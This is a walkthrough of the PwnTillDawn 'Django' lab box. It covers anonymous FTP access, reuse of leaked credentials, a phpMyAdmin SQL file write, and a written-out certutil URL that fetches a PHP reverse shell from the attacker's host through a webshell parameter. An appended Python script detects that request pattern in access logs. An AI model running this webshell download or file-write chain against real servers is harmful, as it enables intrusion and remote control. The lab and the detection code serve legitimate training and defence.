PwnTillDawn Django Walkthrough
Introduction to PwnTillDawn
“PwnTillDawn Online Battlefield is a penetration testing lab created by wizlynx group where participants can test their offensive security skills in a safe and legal environment, but also having fun!”
Link: https://www.wizlynxgroup.com/ || https://online.pwntilldawn.com/
Django
This box has 4 flags to submit, which can be obtained in several ways.
Reconnaissance
Walkthrough
We logged in to FTP with anonymous credentials and found that we could perform directory traversal. Listing the directory, we see a FLAG directory, xampp-control.log and zen.txt.
We downloaded the files and looked at their contents. One line in xampp-control.log points us to a text file that may contain credentials.
Using the get command, we downloaded passwords.txt to our system and viewed its contents. Sure enough, it contains a set of credentials.
FLAG20.txt
Before making use of the credentials, we listed the files in “C:\xampp” from our FTP session and found FLAG20.txt in the same folder. Downloading the file gives us the flag.
Using the credentials from passwords.txt, we browsed to http://10.150.150.212/phpmyadmin/ and logged in.
FLAG18
Digging around the site reveals the flag for flag18 under Databases.
Digging further, we found the SQL tab, which we can use to write a file onto the server.
Once the command is executed, we can access test2.php and run a command to verify that it works.
After confirming that the PHP upload works, we use it to download a webshell from our host machine through the following URL:
http://10.150.150.212/test2.php?cmd=certutil -urlcache -split -f http://10.66.67.50/php_reverse_shell.php shell.php
For more information on the file upload method, there is a very informative guide that lists the methods that can be used.
Credits: https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65
Once the shell has been downloaded, we set up a netcat listener, access the uploaded file, and receive a shell.
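As an added, defender-side example that is not part of the original walkthrough, the following Python script scans constructed Apache/XAMPP access-log lines for the request pattern used above: hits on a PHP file outside a known baseline, a cmd-style query parameter, and a certutil -urlcache download passed through it. The sample log lines, the baseline of known PHP files and the parameter names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Apache/XAMPP combined access-log line; only the fields the checks use are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Query parameters commonly used by one-line PHP command shells (assumed list).
SHELL_PARAMS = {"cmd", "c", "exec", "command"}
# The download-and-save pattern seen in this walkthrough (certutil -urlcache ...).
CERTUTIL_RE = re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I)
# Constructed baseline: PHP entry points this deployment is known to serve.
KNOWN_PHP = {"/index.php", "/phpmyadmin/index.php"}

def inspect_request(target, known_php=KNOWN_PHP):
    """Return detection tags for one request target (path plus query string)."""
    url = urlsplit(target)
    path = unquote(url.path).lower()
    tags = []
    if path.endswith(".php") and path not in known_php:
        tags.append("unknown_php_file")      # e.g. a freshly written test2.php or shell.php
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name.lower() in SHELL_PARAMS:
            tags.append("command_param")     # request shaped like webshell input
            if any(CERTUTIL_RE.search(v) for v in values):
                tags.append("certutil_download")
    return tags

def scan_log(lines, known_php=KNOWN_PHP):
    """Parse access-log lines and return (ip, target, tags) for each flagged request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # skip malformed or non-matching lines
        tags = inspect_request(m.group("target"), known_php)
        if tags:
            hits.append((m.group("ip"), m.group("target"), tags))
    return hits

# Constructed sample log, modelled on the request sequence described in the walkthrough.
SAMPLE_LOG = [
    '10.66.67.50 - - [12/Mar/2021:10:15:01 +0000] "GET /test2.php?cmd=whoami HTTP/1.1" 200 512',
    '10.66.67.50 - - [12/Mar/2021:10:15:09 +0000] "GET /test2.php?cmd=certutil%20-urlcache'
    '%20-split%20-f%20http://10.66.67.50/php_reverse_shell.php%20shell.php HTTP/1.1" 200 912',
    '10.66.67.50 - - [12/Mar/2021:10:15:20 +0000] "GET /shell.php HTTP/1.1" 200 0',
    '10.150.150.5 - - [12/Mar/2021:10:16:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 2048',
]
```

Running scan_log(SAMPLE_LOG) flags the three requests from 10.66.67.50 and leaves the ordinary index.php request alone; in practice the baseline would be built from the deployed application's files.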
FLAG19.txt
FLAG11.txt
Hope this walkthrough helps people who are stuck!